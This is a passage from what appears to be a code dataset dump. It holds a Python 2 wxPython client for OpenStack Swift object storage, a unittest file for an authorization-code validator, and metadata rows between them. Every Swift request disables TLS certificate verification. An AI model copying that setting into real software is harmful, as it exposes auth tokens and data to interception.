    textDialog = wx.TextEntryDialog(self, 'Enter a Container Name to Delete', 'Delete Container', '', wx.OK|wx.CANCEL|wx.CENTRE)
    if textDialog.ShowModal() == wx.ID_OK:
        containerUrl = textDialog.GetValue().strip()
        containerUrl = containerUrl.encode('utf-8')
    textDialog.Destroy()
    if containerUrl == "":
        # Covers both an empty entry and a cancelled dialog.
        self.EmptyInput()
        return
    headerBuf = cStringIO.StringIO()
    bodyBuf = cStringIO.StringIO()
    requestHeader = "X-AUth-Token: %s\r\n\r\n" %(self.authToken)
    c = pycurl.Curl()
    c.setopt(pycurl.URL, self.storageUrl+"/"+containerUrl)
    c.setopt(pycurl.SSL_VERIFYPEER, False)
    c.setopt(pycurl.VERBOSE, False)
    c.setopt(pycurl.TCP_NODELAY, True)
    c.setopt(pycurl.HTTPHEADER, [requestHeader])
    c.setopt(pycurl.CUSTOMREQUEST, "DELETE")
    c.setopt(c.HEADERFUNCTION, headerBuf.write)
    c.setopt(c.WRITEFUNCTION, bodyBuf.write)
    c.perform()
    rtn = c.getinfo(c.HTTP_CODE)
    if not(rtn == 204) :
        wx.MessageBox('Container Delete Failed' ,'Notices' ,wx.OK|wx.ICON_INFORMATION)
        self.textControl.SetDefaultStyle(wx.TextAttr(wx.RED))
        self.textControl.AppendText(">Container Delete Failed\r\n")
        self.textControl.AppendText(headerBuf.getvalue())
        self.textControl.AppendText(bodyBuf.getvalue())
        self.textControl.AppendText("\r\n\r\n")
        self.textControl.SetDefaultStyle(wx.TextAttr(wx.BLACK))
    else:
        self.textControl.AppendText(">Container Delete Success\r\n")
        self.textControl.AppendText("Deleted Container :%s\r\n\r\n" %containerUrl)
    headerBuf.close()
    bodyBuf.close()
    c.close()
    return
def ListObject(self):
    """List objects in the selected container and print name/bytes/mtime.

    GETs ``<storageUrl>/<container>?format=json``; when exactly 10000
    objects come back (Swift's listing page limit) a second page is fetched
    with a ``marker`` query parameter.

    Fix vs. original: ``totalObject`` and ``marker`` are initialised up
    front. Previously the pagination check raised NameError whenever the
    first request failed (``totalObject`` never assigned), and ``marker``
    was built from the loop variable of a possibly-empty loop.
    """
    if self.authToken == "":
        wx.MessageBox('Authentication has not been completed.' ,'Notices' ,wx.OK|wx.ICON_INFORMATION)
        return
    if self.selectedContainer == "":
        wx.MessageBox('Container has not been selected.' ,'Notices' ,wx.OK|wx.ICON_INFORMATION)
        return
    totalObject = 0  # objects listed so far; drives the pagination check
    marker = ""      # "&marker=<last name>" suffix for the next page
    headerBuf = cStringIO.StringIO()
    bodyBuf = cStringIO.StringIO()
    requestHeader = "X-AUth-Token: %s\r\n\r\n\r\n" %(self.authToken)
    c = pycurl.Curl()
    c.setopt(pycurl.URL, self.storageUrl+"/"+self.selectedContainer+"?format=json") #?limit=2&marker=objectname
    c.setopt(pycurl.SSL_VERIFYPEER, False)
    c.setopt(pycurl.VERBOSE, False)
    c.setopt(pycurl.TCP_NODELAY, True)
    c.setopt(pycurl.HTTPHEADER, [requestHeader])
    c.setopt(pycurl.CUSTOMREQUEST, "GET")
    c.setopt(c.HEADERFUNCTION, headerBuf.write)
    c.setopt(c.WRITEFUNCTION, bodyBuf.write)
    c.perform()
    rtn = c.getinfo(c.HTTP_CODE)
    if not(rtn == 200 or rtn == 204) :
        if (rtn == 404):
            self.textControl.AppendText("<EMPTY>\r\n")
        else:
            wx.MessageBox('Show Object List Failed' ,'Notices' ,wx.OK|wx.ICON_INFORMATION)
            self.textControl.SetDefaultStyle(wx.TextAttr(wx.RED))
            self.textControl.AppendText(">Show Object List Failed\r\n")
            self.textControl.AppendText(headerBuf.getvalue())
            self.textControl.AppendText(bodyBuf.getvalue())
            self.textControl.AppendText("\r\n\r\n")
            self.textControl.SetDefaultStyle(wx.TextAttr(wx.BLACK))
    else:
        self.textControl.AppendText(">Show Object List Success\r\n")
        self.textControl.AppendText("--------------------------------------------------------------------------------------\r\n")
        self.textControl.AppendText("[Name]\t\t[Bytes]\t\t[Last_Modified]\r\n")
        self.textControl.AppendText("--------------------------------------------------------------------------------------\r\n")
        # JSON body: list of {'name', 'bytes', 'last_modified'} per object.
        decoded = json.loads(bodyBuf.getvalue())
        for i in decoded:
            totalObject = totalObject + 1
            self.textControl.AppendText("%s\t\t%s\t\t%s\r\n" %(i['name'], i['bytes'], i['last_modified']))
        self.textControl.AppendText("\r\n")
        # NOTE(review): "Tatal" typo kept — user-visible string, not changed here.
        self.textControl.AppendText("Tatal Object : %d\r\n" %totalObject)
        if decoded:
            # Remember the last listed name for the next-page request.
            marker = "&marker=%s" %(decoded[-1]['name'])
    headerBuf.close()
    bodyBuf.close()
    c.close()
    if totalObject == 10000:
        # Exactly one full page returned: fetch the next page after the marker.
        headerBuf = cStringIO.StringIO()
        bodyBuf = cStringIO.StringIO()
        requestHeader = "X-AUth-Token: %s\r\n\r\n\r\n" %(self.authToken)
        c = pycurl.Curl()
        c.setopt(pycurl.URL, self.storageUrl+"/"+self.selectedContainer+"?format=json"+marker.encode('utf-8')) #?limit=2&marker=objectname
        c.setopt(pycurl.SSL_VERIFYPEER, False)
        c.setopt(pycurl.VERBOSE, False)
        c.setopt(pycurl.TCP_NODELAY, True)
        c.setopt(pycurl.HTTPHEADER, [requestHeader])
        c.setopt(pycurl.CUSTOMREQUEST, "GET")
        c.setopt(c.HEADERFUNCTION, headerBuf.write)
        c.setopt(c.WRITEFUNCTION, bodyBuf.write)
        c.perform()
        rtn = c.getinfo(c.HTTP_CODE)
        if not(rtn == 200 or rtn == 204) :
            if (rtn == 404):
                self.textControl.AppendText("<EMPTY>\r\n")
            else:
                wx.MessageBox('Show Object List Failed' ,'Notices' ,wx.OK|wx.ICON_INFORMATION)
                self.textControl.SetDefaultStyle(wx.TextAttr(wx.RED))
                self.textControl.AppendText(">Show Object List Failed\r\n")
                self.textControl.AppendText(headerBuf.getvalue())
                self.textControl.AppendText(bodyBuf.getvalue())
                self.textControl.AppendText("\r\n\r\n")
                self.textControl.SetDefaultStyle(wx.TextAttr(wx.BLACK))
        else:
            self.textControl.AppendText(">Show Object List Success\r\n")
            self.textControl.AppendText("--------------------------------------------------------------------------------------\r\n")
            self.textControl.AppendText("[Name]\t\t[Bytes]\t\t[Last_Modified]\r\n")
            self.textControl.AppendText("--------------------------------------------------------------------------------------\r\n")
            decoded = json.loads(bodyBuf.getvalue())
            for i in decoded:
                totalObject = totalObject + 1
                self.textControl.AppendText("%s\t\t%s\t\t%s\r\n" %(i['name'], i['bytes'], i['last_modified']))
            self.textControl.AppendText("\r\n")
            self.textControl.AppendText("Tatal Object : %d\r\n" %totalObject)
        headerBuf.close()
        bodyBuf.close()
        c.close()
def ObjectMeta(self):
    """Show the metadata (response headers) of a single object.

    Prompts for an object name, issues a GET against
    <storageUrl>/<selectedContainer>/<object>?format=json, and on
    HTTP 200/204 prints the raw response headers into the text control.
    Requires a prior authentication and a selected container.
    """
    # Guard: both an auth token and a selected container must exist first.
    if self.authToken == "":
        wx.MessageBox('Authentication has not been completed.' ,'Notices' ,wx.OK|wx.ICON_INFORMATION)
        return
    if self.selectedContainer == "":
        wx.MessageBox('Container has not been selected.' ,'Notices' ,wx.OK|wx.ICON_INFORMATION)
        return
    objectUrl = ""
    textDialog = wx.TextEntryDialog(self, 'Enter a Object Name to Show', 'Show Object Metadata', '', wx.OK|wx.CANCEL|wx.CENTRE)
    if textDialog.ShowModal() == wx.ID_OK:
        # Name is UTF-8 encoded before being spliced into the URL.
        objectUrl = textDialog.GetValue().strip()
        objectUrl = objectUrl.encode('utf-8')
    textDialog.Destroy()
    # Empty name (or a cancelled dialog) aborts with the standard notice.
    if objectUrl == "":
        self.EmptyInput()
        return
    # headerBuf collects response headers, bodyBuf the response body.
    headerBuf = cStringIO.StringIO()
    bodyBuf = cStringIO.StringIO()
    # NOTE(review): the trailing "\r\n\r\n" inside a pycurl HTTPHEADER item is
    # unusual — header list entries are normally bare "Name: value" strings.
    requestHeader = "X-AUth-Token: %s\r\n\r\n" %(self.authToken)
    c = pycurl.Curl()
    c.setopt(pycurl.URL, self.storageUrl+"/"+self.selectedContainer+"/"+objectUrl+"?format=json")
    c.setopt(pycurl.SSL_VERIFYPEER, False)  # TLS peer verification disabled
    c.setopt(pycurl.VERBOSE, False)
    c.setopt(pycurl.TCP_NODELAY, True)
    c.setopt(pycurl.HTTPHEADER, [requestHeader])
    c.setopt(pycurl.CUSTOMREQUEST, "GET")
    c.setopt(c.HEADERFUNCTION, headerBuf.write)
    c.setopt(c.WRITEFUNCTION, bodyBuf.write)
    c.perform()
    rtn = c.getinfo(c.HTTP_CODE)
    if not(rtn == 200 or rtn == 204) :
        # Failure: show notice and dump headers + body in red.
        wx.MessageBox('Show Object Metadata Failed' ,'Notices' ,wx.OK|wx.ICON_INFORMATION)
        self.textControl.SetDefaultStyle(wx.TextAttr(wx.RED))
        self.textControl.AppendText(">Show Object Metadata Failed\r\n")
        self.textControl.AppendText(headerBuf.getvalue())
        self.textControl.AppendText(bodyBuf.getvalue())
        self.textControl.AppendText("\r\n\r\n")
        self.textControl.SetDefaultStyle(wx.TextAttr(wx.BLACK))
    else:
        # Success: the object metadata lives in the response headers.
        self.textControl.AppendText(">Show Object metadata Success\r\n")
        self.textControl.AppendText(headerBuf.getvalue())
        self.textControl.AppendText("\r\n\r\n")
    headerBuf.close()
    bodyBuf.close()
    c.close()
    return
def UploadObject(self):
    """Upload a local file as an object into the selected container.

    Prompts for a file, streams it with an HTTP PUT to
    <storageUrl>/<selectedContainer>/<filename>, and reports the result
    (HTTP 201/202 = success) plus upload speed in the text control.
    Requires a prior authentication and a selected container.
    """
    if self.authToken == "":
        wx.MessageBox('Authentication has not been completed.' ,'Notices' ,wx.OK|wx.ICON_INFORMATION)
        return
    if self.selectedContainer == "":
        wx.MessageBox('Container has not been selected.' ,'Notices' ,wx.OK|wx.ICON_INFORMATION)
        return
    dialog=wx.FileDialog(self, " Enter a Object Name to Upload", self.dirname, "", "*.*", wx.OPEN)
    # BUG FIX: bail out on cancel; the original fell through with no file
    # selected and crashed later on an undefined file handle.
    if dialog.ShowModal() != wx.ID_OK:
        dialog.Destroy()
        return
    self.filename=dialog.GetFilename()
    self.dirname=dialog.GetDirectory()
    dialog.Destroy()
    try:
        # Size is needed for INFILESIZE; open binary for a byte-exact upload.
        statinfo = os.stat(self.dirname+"/"+self.filename)
        f=open(self.dirname+"/"+self.filename, "rb")
    except os.error:
        wx.MessageBox('File Open failed' ,'Notices' ,wx.OK|wx.ICON_INFORMATION)
        return
    headerBuf = cStringIO.StringIO()
    bodyBuf = cStringIO.StringIO()
    # NOTE(review): X-Delete-After makes Swift auto-delete the object after
    # 86500 seconds (~24h) — confirm this expiry is intentional.
    requestHeader = "X-AUth-Token: %s\r\nX-Delete-After: 86500" %(self.authToken)
    c = pycurl.Curl()
    try:
        c.setopt(pycurl.URL, self.storageUrl+"/"+self.selectedContainer+"/"+self.filename.encode('utf-8'))
        c.setopt(pycurl.SSL_VERIFYPEER, False)  # TLS peer verification disabled
        c.setopt(pycurl.VERBOSE, False)
        c.setopt(pycurl.TCP_NODELAY, True)
        c.setopt(pycurl.NOPROGRESS, False)      # enable the progress callback
        c.setopt(pycurl.PUT, True)
        c.setopt(pycurl.HTTPHEADER, [requestHeader])
        c.setopt(pycurl.CUSTOMREQUEST, "PUT")
        c.setopt(pycurl.INFILE, f)
        c.setopt(pycurl.INFILESIZE, statinfo.st_size)
        c.setopt(c.HEADERFUNCTION, headerBuf.write)
        c.setopt(c.WRITEFUNCTION, bodyBuf.write)
        c.setopt(c.PROGRESSFUNCTION, progress)
        c.perform()
        rtn = c.getinfo(c.HTTP_CODE)
        upspeed = c.getinfo(c.SPEED_UPLOAD)
        totalTime = c.getinfo(c.TOTAL_TIME)
    finally:
        # BUG FIX: the original had `f.close` (no parentheses), so the input
        # file handle was never actually closed.
        f.close()
    if not(rtn == 201 or rtn == 202) :
        wx.MessageBox('Object Upload Failed' ,'Notices' ,wx.OK|wx.ICON_INFORMATION)
        self.textControl.SetDefaultStyle(wx.TextAttr(wx.RED))
        self.textControl.AppendText(">Object Upload Failed\r\n")
        self.textControl.AppendText(headerBuf.getvalue())
        self.textControl.AppendText(bodyBuf.getvalue())
        self.textControl.AppendText("\r\n\r\n")
        self.textControl.SetDefaultStyle(wx.TextAttr(wx.BLACK))
    else:
        # "Successs" typo fixed in the success message.
        self.textControl.AppendText(">Object Upload Success\r\n")
        self.textControl.AppendText("Upload Speed: %s\t\tTotalTime: %s\r\n\r\n" %(upspeed, totalTime))
    headerBuf.close()
    bodyBuf.close()
    c.close()
    return
def DownloadObject(self):
    """Download one object from the selected container to a local file.

    Prompts for the remote object name, then for the local save path, and
    streams the GET response body straight into the opened file.  Success
    is HTTP 200/204; download speed is reported in the text control.
    """
    # Guard: both an auth token and a selected container must exist first.
    if self.authToken == "":
        wx.MessageBox('Authentication has not been completed.' ,'Notices' ,wx.OK|wx.ICON_INFORMATION)
        return
    if self.selectedContainer == "":
        wx.MessageBox('Container has not been selected.' ,'Notices' ,wx.OK|wx.ICON_INFORMATION)
        return
    downFileName = ""
    textDialog = wx.TextEntryDialog(self, ' Enter a Object Name to Download ', 'Object Download', '', wx.OK|wx.CANCEL|wx.CENTRE)
    if textDialog.ShowModal() == wx.ID_OK:
        downFileName = textDialog.GetValue().strip()
        downFileName = downFileName.encode('utf-8')
    textDialog.Destroy()
    if downFileName == "":
        self.EmptyInput()
        return
    dialog=wx.FileDialog(self, " Enter a Object Name to Save", self.dirname, downFileName, "*.*", wx.SAVE)
    if dialog.ShowModal() == wx.ID_OK:
        self.filename=dialog.GetFilename()
        self.dirname=dialog.GetDirectory()
        try:
            # Open writable binary target; response body is written here.
            f=open(self.dirname+"/"+self.filename, "wb+")
        except os.error:
            wx.MessageBox('File Open failed' ,'Notices' ,wx.OK|wx.ICON_INFORMATION)
            return
    # NOTE(review): if the save dialog is cancelled, `f` is never opened and
    # the code below raises NameError — confirm and add an early return.
    dialog.Destroy()
    headerBuf = cStringIO.StringIO()
    bodyBuf = cStringIO.StringIO()
    requestHeader = "X-AUth-Token: %s\r\n" %(self.authToken)
    c = pycurl.Curl()
    c.setopt(pycurl.URL, self.storageUrl+"/"+self.selectedContainer+"/"+downFileName)
    c.setopt(pycurl.SSL_VERIFYPEER, False)  # TLS peer verification disabled
    c.setopt(pycurl.VERBOSE, True)          # verbose on, unlike sibling methods
    c.setopt(pycurl.TCP_NODELAY, True)
    c.setopt(pycurl.NOPROGRESS, False)      # enable the progress callback
    #c.setopt(pycurl.BINARY_TRANSFER, False)
    c.setopt(pycurl.HTTPHEADER, [requestHeader])
    c.setopt(pycurl.CUSTOMREQUEST, "GET")
    # NOTE(review): WRITEDATA and WRITEFUNCTION both target `f`; the
    # WRITEFUNCTION below overrides WRITEDATA, so the first setopt is redundant.
    c.setopt(pycurl.WRITEDATA, f)
    c.setopt(c.WRITEFUNCTION, f.write)
    c.setopt(c.HEADERFUNCTION, headerBuf.write)
    c.setopt(c.PROGRESSFUNCTION, progress)
    c.perform()
    rtn = c.getinfo(c.HTTP_CODE)
    downspeed = c.getinfo(c.SPEED_DOWNLOAD)
    totalTime = c.getinfo(c.TOTAL_TIME)
    f.close()
    if not(rtn == 200 or rtn == 204) :
        # NOTE(review): on failure the error body was already written into
        # the local file (WRITEFUNCTION is f.write), and bodyBuf is never
        # written to, so the AppendText of bodyBuf below prints nothing.
        wx.MessageBox('Object Download Failed' ,'Notices' ,wx.OK|wx.ICON_INFORMATION)
        self.textControl.SetDefaultStyle(wx.TextAttr(wx.RED))
        self.textControl.AppendText(">Object Download Failed\r\n")
        self.textControl.AppendText(headerBuf.getvalue())
        self.textControl.AppendText(bodyBuf.getvalue())
        self.textControl.AppendText("\r\n\r\n")
        self.textControl.SetDefaultStyle(wx.TextAttr(wx.BLACK))
    else:
        self.textControl.AppendText(">Object Download Success\r\n")
        self.textControl.AppendText("Download Speed: %s\t\tTotalTime: %s\r\n\r\n" %(downspeed, totalTime))
    headerBuf.close()
    bodyBuf.close()
    c.close()
    return
def CopyObject(self):
    """Server-side copy of an object within the selected container.

    Opens the project copy dialog for source/destination names, then PUTs
    the destination URL with an X-Copy-From header so Swift performs the
    copy without downloading the data.  Success is HTTP 200/201.
    """
    # Guard: both an auth token and a selected container must exist first.
    if self.authToken == "":
        wx.MessageBox('Authentication has not been completed.' ,'Notices' ,wx.OK|wx.ICON_INFORMATION)
        return
    if self.selectedContainer == "":
        wx.MessageBox('Container has not been selected.' ,'Notices' ,wx.OK|wx.ICON_INFORMATION)
        return
    dialog = DialogClass.dialogCopyObject(self, -1, 'Copy Object')
    dialog.ShowModal()
    dialog.Destroy()
    # NOTE(review): sourceFile/destFile are read after Destroy(); presumably
    # the Python attributes survive wx widget destruction — verify.
    if dialog.sourceFile == "" or dialog.destFile == "" :
        self.EmptyInput()
        return
    headerBuf = cStringIO.StringIO()
    bodyBuf = cStringIO.StringIO()
    # X-Copy-From names the source as <container>/<object>; Content-Length 0
    # because the PUT carries no body for a server-side copy.
    requestHeader = "X-AUth-Token: %s\r\nX-Copy-From: %s/%s\r\nContent-Length: 0\r\n\r\n" %(self.authToken, self.selectedContainer, dialog.sourceFile)
    c = pycurl.Curl()
    c.setopt(pycurl.URL, self.storageUrl+"/"+self.selectedContainer+"/"+dialog.destFile)
    c.setopt(pycurl.SSL_VERIFYPEER, False)  # TLS peer verification disabled
    c.setopt(pycurl.VERBOSE, False)
    c.setopt(pycurl.TCP_NODELAY, True)
    c.setopt(pycurl.HTTPHEADER, [requestHeader])
    c.setopt(pycurl.CUSTOMREQUEST, "PUT")
    c.setopt(c.HEADERFUNCTION, headerBuf.write)
    c.setopt(c.WRITEFUNCTION, bodyBuf.write)
    c.perform()
    rtn = c.getinfo(c.HTTP_CODE)
    if not(rtn == 200 or rtn == 201) :
        # Failure: show notice and dump headers + body in red.
        wx.MessageBox('File Copy Failed' ,'Notices' ,wx.OK|wx.ICON_INFORMATION)
        self.textControl.SetDefaultStyle(wx.TextAttr(wx.RED))
        self.textControl.AppendText(">Object Copy Failed\r\n")
        self.textControl.AppendText(headerBuf.getvalue())
        self.textControl.AppendText(bodyBuf.getvalue())
        self.textControl.AppendText("\r\n\r\n")
        self.textControl.SetDefaultStyle(wx.TextAttr(wx.BLACK))
    else:
        self.textControl.AppendText(">Object Copy Success\r\n")
        self.textControl.AppendText("File Copied: %s -> %s\r\n\r\n" %(dialog.sourceFile, dialog.destFile))
    headerBuf.close()
    bodyBuf.close()
    c.close()
    return
def DeleteObject(self):
    """Delete one object from the selected container via an HTTP DELETE.

    Prompts for the object name, issues DELETE on
    <storageUrl>/<selectedContainer>/<object>, and reports the outcome
    (HTTP 204 = success) in the text control.
    """
    # An auth token and a selected container are prerequisites.
    if self.authToken == "":
        wx.MessageBox('Authentication has not been completed.' ,'Notices' ,wx.OK|wx.ICON_INFORMATION)
        return
    if self.selectedContainer == "":
        wx.MessageBox('Container has not been selected.' ,'Notices' ,wx.OK|wx.ICON_INFORMATION)
        return
    # Ask for the object name; UTF-8 encode it for the URL.
    target = ""
    prompt = wx.TextEntryDialog(self, ' Enter a Object Name to Delete', 'Object Delete', '', wx.OK|wx.CANCEL|wx.CENTRE)
    if prompt.ShowModal() == wx.ID_OK:
        target = prompt.GetValue().strip().encode('utf-8')
    prompt.Destroy()
    if target == "":
        self.EmptyInput()
        return
    # Buffers for the raw response headers and body.
    hdr_buf = cStringIO.StringIO()
    body_buf = cStringIO.StringIO()
    auth_header = "X-AUth-Token: %s\r\n\r\n" %(self.authToken)
    curl = pycurl.Curl()
    curl.setopt(pycurl.URL, self.storageUrl+"/"+self.selectedContainer+"/"+target)
    curl.setopt(pycurl.SSL_VERIFYPEER, False)
    curl.setopt(pycurl.VERBOSE, False)
    curl.setopt(pycurl.TCP_NODELAY, True)
    curl.setopt(pycurl.HTTPHEADER, [auth_header])
    curl.setopt(pycurl.CUSTOMREQUEST, "DELETE")
    curl.setopt(curl.HEADERFUNCTION, hdr_buf.write)
    curl.setopt(curl.WRITEFUNCTION, body_buf.write)
    curl.perform()
    status = curl.getinfo(curl.HTTP_CODE)
    if status == 204:
        self.textControl.AppendText(">Object Delete Success\r\n")
        self.textControl.AppendText("File Deleted: %s\r\n\r\n" %target)
    else:
        # Anything but 204: pop a notice and dump the raw response in red.
        wx.MessageBox('Object Delete Failed' ,'Notices' ,wx.OK|wx.ICON_INFORMATION)
        self.textControl.SetDefaultStyle(wx.TextAttr(wx.RED))
        self.textControl.AppendText(">Object Delete Failed\r\n")
        self.textControl.AppendText(hdr_buf.getvalue())
        self.textControl.AppendText(body_buf.getvalue())
        self.textControl.AppendText("\r\n\r\n")
        self.textControl.SetDefaultStyle(wx.TextAttr(wx.BLACK))
    hdr_buf.close()
    body_buf.close()
    curl.close()
    return
def DeleteContainerAll(self):
    """Delete a container and every object it holds.

    Prompts for a container name, lists its objects via a JSON GET, issues
    a DELETE for each object, then DELETEs the (now empty) container.
    Per-object and final results are logged in the text control.
    """
    # Guard: both an auth token and a selected container must exist first.
    # NOTE(review): the guard checks self.selectedContainer, but all the
    # operations below use the user-typed containerUrl — confirm intent.
    if self.authToken == "":
        wx.MessageBox('Authentication has not been completed.' ,'Notices' ,wx.OK|wx.ICON_INFORMATION)
        return
    if self.selectedContainer == "":
        wx.MessageBox('Container has not been selected.' ,'Notices' ,wx.OK|wx.ICON_INFORMATION)
        return
    containerUrl = ""
    textDialog = wx.TextEntryDialog(self, ' Enter a Container Name to Delete\r\n All Object in Container will be Delete', 'Container Delete', '', wx.OK|wx.CANCEL|wx.CENTRE)
    if textDialog.ShowModal() == wx.ID_OK:
        containerUrl = textDialog.GetValue().strip()
        containerUrl = containerUrl.encode('utf-8')
    textDialog.Destroy()
    if containerUrl == "":
        self.EmptyInput()
        return
    headerBuf = cStringIO.StringIO()
    bodyBuf = cStringIO.StringIO()
    requestHeader = "X-AUth-Token: %s\r\n\r\n" %(self.authToken)
    c = pycurl.Curl()
    # First request: JSON listing of the container's objects.
    # NOTE(review): no marker-based pagination here, so only the first page
    # of the listing is deleted — confirm against very large containers.
    c.setopt(pycurl.URL, self.storageUrl+"/"+containerUrl+"?format=json")
    c.setopt(pycurl.SSL_VERIFYPEER, False)  # TLS peer verification disabled
    c.setopt(pycurl.VERBOSE, False)
    c.setopt(pycurl.TCP_NODELAY, True)
    c.setopt(pycurl.HTTPHEADER, [requestHeader])
    c.setopt(pycurl.CUSTOMREQUEST, "GET")
    c.setopt(c.HEADERFUNCTION, headerBuf.write)
    c.setopt(c.WRITEFUNCTION, bodyBuf.write)
    c.perform()
    rtn = c.getinfo(c.HTTP_CODE)
    if not(rtn == 200 or rtn == 204) :
        # Listing failed: report and dump raw response in red.
        wx.MessageBox('Container Delete Failed' ,'Notice' ,wx.OK|wx.ICON_INFORMATION)
        self.textControl.SetDefaultStyle(wx.TextAttr(wx.RED))
        self.textControl.AppendText(">Container Delete Failed : %d \r\n" %rtn)
        self.textControl.AppendText(headerBuf.getvalue())
        self.textControl.AppendText(bodyBuf.getvalue())
        self.textControl.AppendText("\r\n\r\n")
        self.textControl.SetDefaultStyle(wx.TextAttr(wx.BLACK))
    else:
        # The same curl handle is reused for every DELETE below; only URL and
        # method change.  NOTE(review): the header/body write callbacks stay
        # attached, so the buffers accumulate output across all requests.
        decoded = json.loads(bodyBuf.getvalue())
        for i in decoded:
            # `object` shadows the builtin; kept as-is (behavior-preserving).
            object = i['name']
            object = object.encode('utf-8')
            print self.storageUrl+"/"+containerUrl+"/"+object
            c.setopt(pycurl.URL, self.storageUrl+"/"+containerUrl+"/"+object)
            c.setopt(pycurl.CUSTOMREQUEST, "DELETE")
            c.perform()
            rtn = c.getinfo(c.HTTP_CODE)
            if not(rtn == 204) :
                self.textControl.AppendText("File Delete Failed: %s return[%d]\r\n" %(object, rtn))
            else:
                self.textControl.AppendText("File Deleted: %s return[%d] \r\n" %(object, rtn))
        # Finally delete the container itself (requires it to be empty).
        c.setopt(pycurl.URL, self.storageUrl+"/"+containerUrl)
        c.setopt(pycurl.CUSTOMREQUEST, "DELETE")
        c.perform()
        rtn = c.getinfo(c.HTTP_CODE)
        if not(rtn == 204 ) :
            self.textControl.AppendText("Container Delete Failed: %s [%s]\r\n%s\r\n" %(containerUrl, rtn, bodyBuf.getvalue()))
        else:
            self.textControl.AppendText("Container Deleted: %s [%s]\r\n" %(containerUrl, rtn))
    headerBuf.close()
    bodyBuf.close()
    c.close()
    return
| 43.212682
| 184
| 0.559367
| 3,377
| 32,712
| 5.387622
| 0.066331
| 0.109652
| 0.14153
| 0.040178
| 0.876003
| 0.85814
| 0.832472
| 0.813455
| 0.795702
| 0.774321
| 0
| 0.005322
| 0.299248
| 32,712
| 756
| 185
| 43.269841
| 0.788378
| 0.031517
| 0
| 0.775128
| 0
| 0.005111
| 0.140276
| 0.025125
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0.003407
| 0.010221
| null | null | 0.008518
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
8dbecd9aff2be8395087262041a1354fff2ecb75
| 6,066
|
py
|
Python
|
test/test_authorization_code_validator.py
|
danirod/dummyauth
|
f21ddda21dd3eed202d36399419f6e77d3a438ae
|
[
"0BSD"
] | 1
|
2020-04-05T23:54:56.000Z
|
2020-04-05T23:54:56.000Z
|
test/test_authorization_code_validator.py
|
danirod/dummyauth
|
f21ddda21dd3eed202d36399419f6e77d3a438ae
|
[
"0BSD"
] | 1
|
2019-10-01T20:48:21.000Z
|
2019-10-01T20:48:50.000Z
|
test/test_authorization_code_validator.py
|
danirod/dummyauth
|
f21ddda21dd3eed202d36399419f6e77d3a438ae
|
[
"0BSD"
] | null | null | null |
import httpretty
import sure
from dummyauth.spider import AuthorizationCodeValidator
from unittest import TestCase
class AuthorizationCodeValidatorTestCase(TestCase):
    """Unit tests for AuthorizationCodeValidator against a mocked endpoint.

    Every test mocks the POST authorization endpoint with httpretty and
    drives the validator with one canonical parameter set; the helpers
    below remove the copy-pasted setup the original tests repeated.
    Test method names (including the original "appropiate" spelling) are
    preserved so external tooling selecting tests by name keeps working.
    """

    # Canonical fixtures shared by all tests.
    ENDPOINT = 'http://auth.example.com/login'
    VALID_BODY = '{"me": "http://johndoe.example.com/"}'
    ERROR_BODY = '{"error": "invalid_request"}'

    def _register_endpoint(self, body, status=200):
        # Mock the POST authorization endpoint with a JSON response.
        httpretty.register_uri(httpretty.POST, self.ENDPOINT,
                               adding_headers={'content-type': 'application/json'},
                               body=body,
                               status=status)

    def _make_validator(self):
        # Build a validator with the canonical client/code/redirect params.
        return AuthorizationCodeValidator(
            authorization_endpoint=self.ENDPOINT,
            code='deadbeef',
            client_id='http://client.example.com/',
            redirect_uri='http://client.example.com/callback',
        )

    @httpretty.httprettified
    def test_spider_handles_valid_requests(self):
        self._register_endpoint(self.VALID_BODY)
        self.assertTrue(self._make_validator().valid)

    @httpretty.httprettified
    def test_spider_handles_valid_profile_url(self):
        self._register_endpoint(self.VALID_BODY)
        self.assertEqual(self._make_validator().profile_url,
                         'http://johndoe.example.com/')

    @httpretty.httprettified
    def test_spider_handles_invalid_requests(self):
        self._register_endpoint(self.ERROR_BODY, status=400)
        self.assertFalse(self._make_validator().valid)

    @httpretty.httprettified
    def test_spider_handles_invalid_request_code(self):
        self._register_endpoint(self.ERROR_BODY, status=400)
        self.assertEqual(self._make_validator().error, 'invalid_request')

    @httpretty.httprettified
    def test_spider_sends_appropiate_request(self):
        self._register_endpoint(self.VALID_BODY)
        self._make_validator().valid  # accessing .valid triggers the HTTP call
        self.assertTrue(httpretty.has_request())

    @httpretty.httprettified
    def test_spider_sends_appropiate_code(self):
        self._register_endpoint(self.VALID_BODY)
        self._make_validator().valid
        payload = httpretty.last_request().parsed_body
        self.assertEqual(payload['code'][0], 'deadbeef')

    @httpretty.httprettified
    def test_spider_sends_appropiate_client_id(self):
        self._register_endpoint(self.VALID_BODY)
        self._make_validator().valid
        payload = httpretty.last_request().parsed_body
        self.assertEqual(payload['client_id'][0], 'http://client.example.com/')

    @httpretty.httprettified
    def test_spider_sends_appropiate_redirect_uri(self):
        self._register_endpoint(self.VALID_BODY)
        self._make_validator().valid
        payload = httpretty.last_request().parsed_body
        self.assertEqual(payload['redirect_uri'][0],
                         'http://client.example.com/callback')
| 48.919355
| 85
| 0.600725
| 566
| 6,066
| 6.25265
| 0.114841
| 0.115852
| 0.086465
| 0.101724
| 0.901385
| 0.899124
| 0.899124
| 0.791184
| 0.759537
| 0.759537
| 0
| 0.001997
| 0.257171
| 6,066
| 123
| 86
| 49.317073
| 0.7834
| 0
| 0
| 0.745614
| 0
| 0
| 0.333168
| 0.029014
| 0
| 0
| 0
| 0
| 0.017544
| 1
| 0.070175
| false
| 0
| 0.035088
| 0
| 0.114035
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5c04db2f5adc13767d9fcc40cddbd980f094782f
| 3,471
|
py
|
Python
|
test/automaton_generation/test_universal_automaton_generation.py
|
rominf/pyffs
|
6c805fbfd7771727138b169b32484b53c0b0fad1
|
[
"MIT"
] | 21
|
2018-07-17T13:21:11.000Z
|
2022-03-07T03:00:37.000Z
